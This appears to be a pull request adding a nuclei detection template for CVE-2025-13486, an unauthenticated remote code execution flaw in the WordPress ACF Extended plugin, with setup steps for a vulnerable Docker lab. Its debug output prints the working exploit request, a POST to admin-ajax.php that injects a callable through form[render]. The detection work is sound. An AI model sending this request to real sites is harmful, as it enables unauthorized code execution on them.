/claim #14212

PR Information

• Added CVE-2025-13486 - WordPress ACF Extended Unauthenticated Remote Code Execution
• References:
  • https://nvd.nist.gov/vuln/detail/CVE-2025-13486
  • https://patchstack.com/database/wordpress/plugin/acf-extended/vulnerability/wordpress-advanced-custom-fields-extended-plugin-0-9-0-5-0-9-1-1-unauthenticated-remote-code-execution-vulnerability
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-extended/advanced-custom-fields-extended-0905-0911-unauthenticated-remote-code-execution

Template validation

• Validated with a host running a vulnerable version and/or configuration (True Positive)
• Validated with a host running a patched version and/or configuration (avoid False Positive)

Additional Details

Vulnerable Docker Environment: https://github.com/KrE80r/cve-2025-13486-vuln-setup

git clone https://github.com/KrE80r/cve-2025-13486-vuln-setup
cd cve-2025-13486-vuln-setup

# 1. Download plugins (run once)
./download-plugins.sh

# 2. Add ACF Pro to plugins/ (required - see script output for options)

# 3. Start environment
docker compose up -d

# 4. Wait ~30 seconds for setup, then test
nuclei -t CVE-2025-13486.yaml -u http://localhost:8888

Debug Output

nuclei -u http://localhost:8888 -t CVE-2025-13486.yaml -debug

[INF] [CVE-2025-13486] Dumped HTTP request for http://localhost:8888

GET / HTTP/1.1
Host: localhost:8888

[INF] [CVE-2025-13486] Dumped HTTP request for http://localhost:8888/wp-admin/admin-ajax.php

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=acfe/form/render_form_ajax&nonce=a449292b33&form[render]=print_r&form[rce_proof]=CVE2025RCE36P4GWD6DV0Oxy1GDf5lq2QEvnt

[CVE-2025-13486] [http] [critical] http://localhost:8888/wp-admin/admin-ajax.php
[INF] Scan completed in 458ms. 2 matches found.

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Contribution Guideline